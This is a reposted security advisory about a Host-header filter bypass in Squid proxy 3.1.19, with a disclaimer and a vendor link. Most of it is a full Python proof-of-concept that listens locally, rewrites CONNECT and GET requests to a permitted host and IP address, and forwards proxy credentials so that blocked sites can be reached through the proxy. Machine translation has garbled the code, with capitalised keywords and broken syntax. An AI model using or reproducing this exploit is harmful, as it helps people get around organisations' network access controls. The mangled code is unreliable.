Squid Proxy 'host' HTTP header Security Restriction Bypass Vulnerability

Source: Internet
Author: User
Tags squid proxy

Release date: 2012-04-16
Updated on: 2012-04-17

Affected Systems:
Squid Web Proxy Cache 3.1.19
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53024

Squid is an efficient Web Cache and proxy program. It was initially developed for the Unix platform and has been transplanted to Linux and most Unix systems, the latest Squid can run on Windows.

Squid Proxy has a security vulnerability in the implementation of filter rules. Successful attacks allow attackers to bypass certain security restrictions.

<* Source: Gabriel Menezes Nunes (gab.mnunes@gmail.com)
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Gabriel Menezes Nunes (gab.mnunes@gmail.com) provides the following test methods:

Import socket, struct, sys, time
From threading import Thread


# The timeOut can be changed if the proxy is slow.
# Tested in GMail, Facebook, Youtube and several blocked sites.
# The proxy get the Host field of the http header and do not verify anything else.
# It trusts on the HTTP Header and it can be modified by the attacker.

TimeOut = 0.8
IsGet = 0
HostNameG = ""
PacoteGet = ""
Port = 8080 # Listening port
ProxyAddr = "vulnerableProxy.com" # vulnerable proxy
ProxyPort = 8080 # proxy port

Def handle (client, globalSock ):

Client. settimeout (timeOut)

Global hostNameG

While 1:

Dados = ""
Tam = 0
While 1:
Try:
Dados2 = client. recv (1024)
Tam = tam + len (dados2)
Dados = dados + dados2
Failed t socket. timeout:

Break


Dd = dados. find ("CONNECT") # if the packet is a CONNECT METHOD
If dd! =-1:
Dd2 = dados. find (":")
HostName = dados [dd + 8: dd2]

IpAddr = socket. gethostbyname (hostName) # changing the method to connect to the ip address, not the dns domain
Pacote = dados
HostHeader = "Host:" + hostName
Pacote = pacote. replace (hostHeader, "Host: www.uol.com.br") # changing the host field with a value that is accepted by the proxy
Pacote = pacote. replace (hostName, ipAddr) # changind domain for ip



Dados = pacote

Getd = dados. find ("GET ")
Getd2 = dados. find ("//")
Getd3 = dados. find ("/", getd2 + 2)
HostName = dados [getd2 + 2: getd3]


If getd! =-1:
GlobalSock. close ()
GlobalSock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
GlobalSock. connect (proxyAddr, proxyPort ))
GlobalSock. settimeout (timeOut)
Getd2 = dados. find ("//")
Getd3 = dados. find ("/", getd2 + 2)

HostName = dados [getd2 + 2: getd3]

ProxyAuth = ""
ProxyAuthN = dados. find ("Proxy-Authorization :")
If proxyAuthN! =-1:
ProxyAuthNN = dados. find ("\ r \ n", proxyAuthN)
ProxyAuth = dados [proxyAuthN: proxyAuthNN]


IpAddr = socket. gethostbyname (hostName)

Info = "CONNECT" + ipAddr + ": 80 HTTP/1.1 \ r \ n"
If proxyAuthN! =-1:
Info + = proxyAuth + "\ r \ n"

Info + = "Host: www.uol.com.br \ r \ n"

GlobalSock. send (info)
Tam = 0
Gdata = ""

While 1:
Try:

Gdata2 = globalSock. recv (1024)

Tam = tam + len (gdata2)
Gdata = gdata + gdata2

If len (gdata2) = 0:
Break


Failed t socket. timeout:

Break





GlobalSock. send (dados)
Tam = 0
Gdata = ""

While 1:
Try:

Gdata2 = globalSock. recv (1024)

If len (gdata2)> 0:
Client. send (gdata2)

Tam = tam + len (gdata2)
Gdata = gdata + gdata2

If len (gdata2) = 0:
Break


Failed t socket. timeout:

Break


Print 'proxy bypass'
Print 'by Gabriel Menezes Nunes'
Print 'Tested on McAfee Web Gateway 7 and Squid proxy'
Sockzao = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Print 'attacked Proxy :',
Print proxyAddr
Print 'listening on ',
Print port
Sockzao. bind ("", port ))

Sockzao. listen (6)

While 1:
Print 'Waiting for ONS ons'
Client, address = sockzao. accept ()
Print 'client connected'
Print address
GlobalSock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
GlobalSock. connect (proxyAddr, proxyPort ))
GlobalSock. settimeout (timeOut)

T = Thread (target = handle, args = (client, globalSock ,))
T. start ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Squid
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.squid-cache.org

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.